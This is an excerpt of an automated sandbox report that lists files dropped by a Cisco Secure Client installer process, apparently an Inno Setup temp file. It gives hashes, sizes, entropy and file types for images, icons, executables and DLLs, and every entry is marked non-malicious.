                                                                                                                                                                                                  SHA-512:B7F06E961C2C2BAC0EFC5633E213D90E3206093593988BD04CE84DA13B1D1B4F0B83DEB77FF247E6681A645004FD37C2866FF83EB7A6A5E3E581B0868AB58C3E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7xE0NSVUvFAccOOfACD09VvVupRqR5/MXMmxHlWX:YY+vFr+cvV8w3MXMm+
                                                                                                                                                                                                  MD5:D3BD002D9E657FC264347FE2FE45EE8D
                                                                                                                                                                                                  SHA1:8EC6528F2E8A07036C5D5F439FA0438C99CE814E
                                                                                                                                                                                                  SHA-256:B17D8F8BC1B971962A798743630816DFEF50526A2692BB458A7B1B6A546D28B0
                                                                                                                                                                                                  SHA-512:3BF535A63BCE729ABD443CA4265147DB46DFF698BC2AA27C7FFE430527F7C4FD921AFFBD6E789BC00EAC4DFFE300E82488A8C4886DC9D629DCA6B5CF905C0624
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2245
                                                                                                                                                                                                  Entropy (8bit):7.881067272381913
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RTfEfdH62oMLD03CqIngSp9wZM/vgRzmD0XQ8/CvbJkfG2:RwfYHt6qKmzmD0g8/Cv9kfG2
                                                                                                                                                                                                  MD5:FC4A9201524066297A4C6DD0760D646C
                                                                                                                                                                                                  SHA1:7B6B7710A1B9EEDAC515FEEE90728A405AC07937
                                                                                                                                                                                                  SHA-256:B19294D4FF3378820B91BF8D2DBC53CB9C8BB531A5CA7E0F4C728AC757C0CD29
                                                                                                                                                                                                  SHA-512:2597C04C2740000747731CB3FF55E7C15675D86578CD0FC73A8F04D84CD084142BF0BFAE55DD81B6AFA1CDE2585EEF233B9BBAB1C05655B3099FA1BBFAECD3DD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                                                                                  MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                                                                                  SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                                                                                  SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                                                                                  SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7ye/67M2KK09AtPNFPQM7vcvei4A62GCv+OQRWqxEz:de/YM2KYBTcKA62VWvE
                                                                                                                                                                                                  MD5:E49813F0A990FD98318710C0F0BFDA21
                                                                                                                                                                                                  SHA1:FD09D47A8BA649393221D5048D3BFF1FFADD3496
                                                                                                                                                                                                  SHA-256:79C957FB0133496B0266E8F5441982D3F1DAB781B90FBC34F59D75968577CD61
                                                                                                                                                                                                  SHA-512:8883387871CBE8B3778F5D95A95700D99B7D4737696051436C06060C645F83E25255A76AA73CD5BA1B03FC5797D8F6B99D1B0E489B5421D26D4E7DBFD358EA65
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                                                                                  MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                                                                                  SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                                                                                  SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                                                                                  SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                                                                                  MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                                                                                  SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                                                                                  SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                                                                                  SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                                                                                  MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                                                                                  SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                                                                                  SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                                                                                  SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2002
                                                                                                                                                                                                  Entropy (8bit):7.874049849617631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:aYtizXuhGfrlz7ES0+AXMzboB3CiWBgvnUeHAG:nkVFNA8Pq39/UegG
                                                                                                                                                                                                  MD5:513D5EA87AFF39BFAC791F6A1AEA44B6
                                                                                                                                                                                                  SHA1:1858020A95D380478119D11C567D686B3097CEC7
                                                                                                                                                                                                  SHA-256:E04B608228DB3AB98917F8B62BB3F64FFBC6E272FFD2B84B2CEB752838FE4485
                                                                                                                                                                                                  SHA-512:2F26AECB0AE3B423B79B4EFDF7CFF8535236E62102F0F4DB9C98A88243B3B1A6EE5CB30F6D049FC3F5E19ABBF22C5DF19805ACB2F7FD3BEB77D7D33AA351E5D5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1006184
                                                                                                                                                                                                  Entropy (8bit):5.97738342017222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:9/9IZHQOBWLxPXdwWeKHI0+DPwYZC3Yeba96ga8nXNBZK/8id:9V2HQO6PqtPwJ3Yijg/dB0Ei
                                                                                                                                                                                                  MD5:744D2DC7CA442E065AC4F23C6A7B9E5F
                                                                                                                                                                                                  SHA1:0039BE9938086F925F321EC8B2FD4D008F600C1A
                                                                                                                                                                                                  SHA-256:4E9E9F15FFBFC9729F4BC561D8670214A86822D682F49A2B286BB798FD59B549
                                                                                                                                                                                                  SHA-512:918009B74EAF5CD932E7BFE1CBD65425917D8CFCDB32B6A10FF2DD44A894E06DA77544522B72F77880D1ADD9961DB0A3401CC20242976E241499F65899E76826
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):451
                                                                                                                                                                                                  Entropy (8bit):3.838636988372643
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:3FFU5eWNwSrzakk5CGvFF6cqEPtvFFEHxiulEk9bkNy4SQUa:1e5eU/aHHAcqE/uxiTKTM
                                                                                                                                                                                                  MD5:F31B286BC9DAC414CAE57B36020FDB4A
                                                                                                                                                                                                  SHA1:BD9D861EA0BC7DBDB9A1C9949ADFB7BDF3345C6B
                                                                                                                                                                                                  SHA-256:7778B7BB7E7F9D25D71747BAA3BEB76E39C0336EB9DA0D823D7C6297540E7975
                                                                                                                                                                                                  SHA-512:937B660BDD91A8467DB83F9B5B25046D0443EB2648671CE420F9A032123A479B249B9001D860BDA4FE3488065F0FF02AD01BA758CB11EE07710C7651FA072945
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:{.. "downloader" : {.. "display-name" : "Cisco Secure Client - Downloader",.. "type" : "exe",.. "uri" : "binaries/vpndownloader.exe",.. "hash" : "7B6826DD31DB6E559BBF873DE756292B22B910F319C6C4B09D7A62A5312A4AC3",.. "hash-type" : "sha256",.. "version" : "5.0.05040".. }..}..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):745576
                                                                                                                                                                                                  Entropy (8bit):6.225379685413281
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:Qx5TysIG9cavT2FWgBKkuD/wQoJ4GMJzu:cxIGKavT2FWz/wQffzu
                                                                                                                                                                                                  MD5:DB9F087F33F5375F0883F4E29F81074C
                                                                                                                                                                                                  SHA1:1D9715CDFA425F4F6FA14D80233B9ECE8F9AA89E
                                                                                                                                                                                                  SHA-256:5D27CE634581F9CEE12C17D9F4AD6AB1B7C6BCDBB911618E7416D2FB4F1981F0
                                                                                                                                                                                                  SHA-512:A740845C79909898881742BA552F8358EE35EA33077A41EA2F9BC4FA824923956AFB1AB3D7870FEE626110BB51FC347AC3D04A2D84747D99EA98B1F3E9FB98C0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):119912
                                                                                                                                                                                                  Entropy (8bit):6.60185962501979
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:pykiJ1Z1K95jvS8BBw/qZqocqQThEt9WSt6MlNNp:MkiHTMBBaNEtUS9lNz
                                                                                                                                                                                                  MD5:E418E6429D29325A842E8A5F01B57236
                                                                                                                                                                                                  SHA1:D075045BC923F0AD63907CDF47AF6FE7B40DB49C
                                                                                                                                                                                                  SHA-256:EAD03108A441D27DC347649DDA3F5BBD2144B5EC35B775944761F7BBFFC95CB2
                                                                                                                                                                                                  SHA-512:92969A8394DF09973DE2F5E8A528A41EC046B5C0CCA3292CD734DF900AF1EB85A3C8643273051D1E2B27B82EC992D61559A9BB06A4B49064FECCB64EB35D2876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):286824
                                                                                                                                                                                                  Entropy (8bit):6.617095335993768
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:tnTXBb1av9tRiTYNC2s2jSPah5WQXR+1XAOtMFK:Lcv9tRiUNLV+1XHf
                                                                                                                                                                                                  MD5:A46C978EB55D64043AAC769320503C12
                                                                                                                                                                                                  SHA1:60AD2BB287B1E6F768EA873B1390ACA13A853999
                                                                                                                                                                                                  SHA-256:19E4270B838CBC3054175427E9C5DA3BBACD92A0E69ECE036C490FC3F13302B1
                                                                                                                                                                                                  SHA-512:DFD94979A6AD9AF454C40324A42FD83CB0F14E2EEFEBF81810DEB5A4A24E0EA3B6466E0D28E32BBC0192D732B9D6B2429843E22F7E07F42D2EBE5835A3E47ACE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1865320
                                                                                                                                                                                                  Entropy (8bit):6.970258455602142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:cN4UkzzVwcS5/h2m7tPpbO8in1CPwDv3uFbvYdkYuj:cNb/h26XbO8K1CPwDv3uFbv3
                                                                                                                                                                                                  MD5:401E2AAFE861E1BBCC04EEED82868DBF
                                                                                                                                                                                                  SHA1:D4ADD73521989319137E731485CE64DC370AAFE6
                                                                                                                                                                                                  SHA-256:09EF0662458A6B07BC5B063576981CACF74E7E7B3FD355FF6EF49395A8D95183
                                                                                                                                                                                                  SHA-512:891731F36B327E2B33AC31C39E869D8FE4CB4A7B289F3183857A0671C5DACA700552A5EAF29A07AC537330B57A0C45DC27DDE8AA5B7AC33C9F8A6F8E9B1EE968
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):449128
                                                                                                                                                                                                  Entropy (8bit):6.524987350757864
                                                                                                                                                                                                  Encrypted:false
